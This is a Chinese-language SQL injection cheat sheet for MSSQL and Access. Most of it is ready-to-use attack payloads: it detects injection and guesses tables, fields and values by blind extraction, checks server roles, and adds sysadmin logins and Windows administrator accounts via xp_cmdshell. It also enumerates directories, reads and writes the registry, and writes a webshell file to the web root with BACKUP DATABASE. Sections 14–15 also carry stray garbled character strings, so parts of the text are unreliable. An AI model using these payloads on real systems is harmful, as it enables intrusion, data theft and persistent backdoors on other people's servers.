1.判断是否有注入 ;and 1=1 ;and 1=2 （两次返回的页面不同，说明参数被带入了查询，存在注入）
2.初步判断是否是mssql ;and user>0 （user 是 nvarchar，和整数比较时转换失败，mssql 会在报错信息里带出当前用户名；这是一种报错型判断）
3.注入参数是字符型 'and [查询条件] and ''=' （用 ''=' 闭合原语句末尾的引号）
4.搜索时没过滤参数的 'and [查询条件] and '%25'=' （%25 是 URL 编码后的 %，用于闭合 LIKE '%...%' 形式的搜索语句）
5.判断数据库系统（按各自的系统表是否存在来区分）

;and (select count(*) from sysobjects)>0    mssql

;and (select count(*) from msysobjects)>0   access
6.猜表名 ;and (select count(*) from [表名])>0 （from 后面跟的是表名，返回正常页面说明该表存在）
7.猜字段 ;and (select count(字段名) from 表名)>0 （字段不存在时语句报错）
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0 （把 0 换成其他数值，用二分法逼近真实长度）
9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 （mid 的第二个参数是字符位置，逐位递增；比较值同样用二分法逼近）

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 （substring 的第二个参数是字符位置，逐位递增）
10.测试权限结构(mssql)（IS_SRVROLEMEMBER / IS_MEMBER 返回 1 表示当前登录是该角色成员，0 表示不是，NULL 表示角色名无效或无权查询）

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--   （IS_MEMBER 检查的是当前数据库中的数据库角色，而不是服务器角色）
11.添加mssql和系统的帐户（需要 sysadmin 权限；以下存储过程按官方文档的参数顺序写出）

;exec master.dbo.sp_addlogin 'username';--   （第二个参数可以直接给密码：sp_addlogin 'username','password'）
;exec master.dbo.sp_password null,'password','username';--   （参数顺序为 旧密码,新密码,登录名；sp_addlogin 已带密码时可省略这一步）

;exec master.dbo.sp_addsrvrolemember 'username','sysadmin';--   （参数顺序为 登录名,角色名）

;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--   （各 /选项 之间要有空格）

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

注意：sp_addlogin / sp_password / sp_addsrvrolemember 已被标记为弃用，新版本中对应 CREATE LOGIN / ALTER LOGIN / ALTER SERVER ROLE；xp_cmdshell 在 SQL Server 2005 及以后默认关闭，需要先通过 sp_configure 开启；net user 等命令以 SQL Server 服务帐户的身份执行，该帐户的系统权限决定命令能否成功。
12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'   （xp_dirtree 返回 子目录名,深度 两列，与 dirs 的两列一一对应）

;and (select top 1 paths from dirs)>0   （varchar 与整数比较失败，报错信息中带出路径）

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0   （把已经得到的路径逐条排除，直到取完）
(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;--   获得当前所有驱动器（返回四列，正好填满 temp）

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--   获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   查看文件的内容（需要 xp_cmdshell 已开启）
13.mssql中的注册表扩展存储过程（xp_reg* 都在 master 中；写入和删除操作需要 sysadmin 权限）

xp_regenumvalues 根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   以多个记录集方式返回该子键下所有键值

xp_regread 根键,子键,键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   返回指定键值的内容

xp_regwrite 根键,子键,值名,值类型,值

常用的值类型有两种：REG_SZ 表示字符串，REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'   写入注册表

xp_regdeletevalue 根键,子键,值名

;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   删除某个值

xp_regdeletekey 根键,子键

;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   删除键，包括该键下所有值
14.mssql的backup创建webshell（利用 BACKUP DATABASE 把表内容写到磁盘文件：insert 的字符串就是要写入的 webshell 代码，备份文件带有二进制头，代码原样夹在其中；需要备份权限，且 SQL Server 服务帐户对目标路径有写权限）
-- Writes the contents of a table into a file on the server via BACKUP DATABASE.
-- The resulting file is a SQL Server backup image, not a clean text file: the
-- bytes inserted into cmd.str are embedded verbatim between binary backup
-- headers. The technique relies on the web server's ASP parser tolerating the
-- surrounding binary and executing only the <% ... %> block (not verified here).
-- The string literal below is empty on this page; the shell payload goes there.
USE model;
-- NOTE(review): model is the template for every database created afterwards,
-- so a table left here is copied into each new database.
CREATE TABLE cmd (str image);
INSERT cmd (str) VALUES ('');
-- Needs BACKUP DATABASE permission on model and write access for the SQL Server
-- service account at the target path.
BACKUP DATABASE model TO DISK = 'c:\l.asp';
meM61ue_2
laX67Vjv
m@#@7[6]o
15.mssql内置函数 |h{#r7H0
9+"\7MHw
;and (select @@version)>0 获得Windows的版本号 U|YIu!^
W%&'EJ)62
;and user_name()='dbo' 判断当前系统的连接用户是不是sa zZ})$Ny(
!-<PV
;and (select user_name())>0 爆当前系统的连接用户 !^*-]p/z
WY`hNT6M
;and (select db_name())>0 得到当前连接的数据库 -'F? |
$9In\x
cpe/GvD5]
%$3)xtS6
16.简洁的webshell（与第14条做法相同，只是备份目标改为站点目录下的文件）
-- Same file-drop technique as above, pointed at a web root path: a table in
-- the model database is filled with the shell text and then dumped to disk
-- with BACKUP DATABASE. Backup headers surround the inserted bytes, so the
-- file is only usable if the ASP parser skips the binary (not verified here).
-- The literal is empty on this page; the shell payload belongs in it.
USE model;
-- NOTE(review): anything created in model is inherited by databases created later.
CREATE TABLE cmd (str image);
INSERT cmd (str) VALUES ('');
-- Requires backup permission and a service account that can write to g:\wwwtest.
BACKUP DATABASE model TO DISK = 'g:\wwwtest\l.asp';